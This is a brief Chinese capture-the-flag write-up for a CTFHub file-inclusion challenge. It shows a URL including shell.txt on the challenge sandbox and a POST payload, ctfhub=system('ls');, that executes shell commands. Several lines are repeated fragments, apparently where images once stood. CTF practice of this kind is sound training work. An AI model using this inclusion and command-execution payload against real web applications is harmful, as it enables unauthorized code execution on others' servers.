天天看点

CTFHUB 文件包含 RCEpost:ctfhub=system(‘ls’);

CTFHUB 文件包含

ctfhub RCE 文件包含 write up

CTFHUB 文件包含 RCEpost:ctfhub=system(‘ls’);

审计一下代码,铁铁们可以百度一下strpos()的漏洞哦

#函数查找字符串在另一字符串中第一次出现的位置(区分大小写) 
strpos("You love php, I love php too!","php");
           
CTFHUB 文件包含 RCEpost:ctfhub=system(‘ls’);

“我有一个shell,怎么用?” 这个是题目给的包含文件

#request = post + get

CTFHUB 文件包含 RCEpost:ctfhub=system(‘ls’);

于是构造payload,往ctfhub里传参

http://challenge-2bfb323ac5bd651f.sandbox.ctfhub.com:10080?file=shell.txt

post:ctfhub=system(‘ls’);

CTFHUB 文件包含 RCEpost:ctfhub=system(‘ls’);
CTFHUB 文件包含 RCEpost:ctfhub=system(‘ls’);
CTFHUB 文件包含 RCEpost:ctfhub=system(‘ls’);

取走旗子,请大牛轻喷## ctfhub